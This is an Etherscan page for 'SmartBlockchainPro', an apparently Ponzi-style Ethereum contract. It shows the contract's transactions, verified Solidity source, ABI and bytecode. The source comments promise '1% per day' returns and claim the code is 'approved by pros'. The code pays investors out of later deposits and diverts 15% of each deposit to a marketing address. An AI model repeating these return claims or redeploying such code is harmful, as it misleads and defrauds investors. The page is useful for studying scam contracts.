ETH Price: $2,638.07 (+7.74%)
Gas: 2 Gwei

Contract

0x0513CE8013F27A47a0088fFAaC94fbb0fe6309d8
 

Overview

ETH Balance

0.002507864406779662 ETH

Eth Value

$6.62 (@ $2,638.07/ETH)

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Transfer74047892019-03-20 8:55:591969 days ago1553072159IN
Smart-blockchain.pro
0 ETH0.000239856
0x5ab5a10765619672018-10-22 10:25:092118 days ago1540203909IN
Smart-blockchain.pro
0.01 ETH0.000283914
Transfer65497532018-10-20 10:37:342120 days ago1540031854IN
Smart-blockchain.pro
0.01 ETH0.000378294
0x6080604065496592018-10-20 10:15:082120 days ago1540030508IN
 Create: SmartBlockchainPro
0 ETH0.001155634

Latest 3 internal transactions

Advanced mode:
Parent Transaction Hash Block From To
74047892019-03-20 8:55:591969 days ago1553072159
Smart-blockchain.pro
0.01449213 ETH
65619672018-10-22 10:25:092118 days ago1540203909
Smart-blockchain.pro
0.0015 ETH
65497532018-10-20 10:37:342120 days ago1540031854
Smart-blockchain.pro
0.0015 ETH
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
SmartBlockchainPro

Compiler Version
v0.4.25+commit.59dbf8f1

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
/**
 *Submitted for verification at Etherscan.io on 2018-10-20
*/

pragma solidity ^0.4.25;

/**
 *
 *  https://smart-blockchain.pro
 *  High profit investment program
 *  - More than 30% monthly gain! 1% per day!
 *  - Huge promotion campaign for a long life of our Project
 *  - Clean and fair smart code used
 *
 *	based on easyInvest SC
 *
 * How to use:
 *  1. Send any amount of ether to make an investment
 *  2a. Claim your profit by sending 0 ether transaction any time
 *  OR
 *  2b. Send more ether to reinvest AND get your profit at the same time
 *
 * RECOMMENDED GAS LIMIT: 200000
 * RECOMMENDED GAS PRICE: get from https://ethgasstation.info/
 *
 * Contract reviewed and approved by pros!
 *
 */
contract SmartBlockchainPro {
    // records amounts invested
    mapping (address => uint256) invested;
    // records blocks at which investments were made
    mapping (address => uint256) atBlock;
	
	// address to collect budgets for marketing campaign
	address public marketingAddr = 0x43bF9E5f8962079B483892ac460dE3675a3Ef802;

    // this function called every time anyone sends a transaction to this contract
    function () external payable {
        // if sender (aka YOU) is invested more than 0 ether
        if (invested[msg.sender] != 0) {
            // calculate profit amount as such:
            // amount = (amount invested) * 1% * (blocks since last transaction) / 5900
            // 5900 is an average block count per day produced by Ethereum blockchain
            uint256 amount = invested[msg.sender] * 1 / 100 * (block.number - atBlock[msg.sender]) / 5900;

            // send calculated amount of ether directly to sender (aka YOU)
            address sender = msg.sender;
            sender.send(amount);
        }

		if (msg.value != 0) {
			// marketing commission is 15% from your investment
			marketingAddr.send(msg.value * 15 / 100);
		}
		
        // record block number and invested amount (msg.value) of this transaction
        atBlock[msg.sender] = block.number;
        invested[msg.sender] += msg.value;
    }
}

Contract Security Audit

Contract ABI

[{"constant":true,"inputs":[],"name":"marketingAddr","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"}]

60806040527343bf9e5f8962079b483892ac460de3675a3ef802600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555034801561006557600080fd5b50610315806100756000396000f300608060405260043610610041576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680633ff42b921461026c575b60008060008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541415156101665761170c600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020544303606460016000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020540281151561011e57fe5b040281151561012957fe5b0491503390508073ffffffffffffffffffffffffffffffffffffffff166108fc839081150290604051600060405180830381858888f19350505050505b6000341415156101d857600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6064600f34028115156101bb57fe5b049081150290604051600060405180830381858888f19350505050505b43600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550346000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505050005b34801561027857600080fd5b506102816102c3565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16815600a165627a7a723058209f9071f8e780573e63366ffcf324d522bcc5062ca21c855d6c87d8285810ac590029

Deployed Bytecode

0x608060405260043610610041576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680633ff42b921461026c575b60008060008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541415156101665761170c600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020544303606460016000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020540281151561011e57fe5b040281151561012957fe5b0491503390508073ffffffffffffffffffffffffffffffffffffffff166108fc839081150290604051600060405180830381858888f19350505050505b6000341415156101d857600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6064600f34028115156101bb57fe5b049081150290604051600060405180830381858888f19350505050505b43600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550346000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505050005b34801561027857600080fd5b506102816102c3565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16815600a165627a7a723058209f9071f8e780573e63366ffcf324d522bcc5062ca21c855d6c87d8285810ac590029

Swarm Source

bzzr://9f9071f8e780573e63366ffcf324d522bcc5062ca21c855d6c87d8285810ac59

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

OVERVIEW

Ethereum multiplier contract.

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.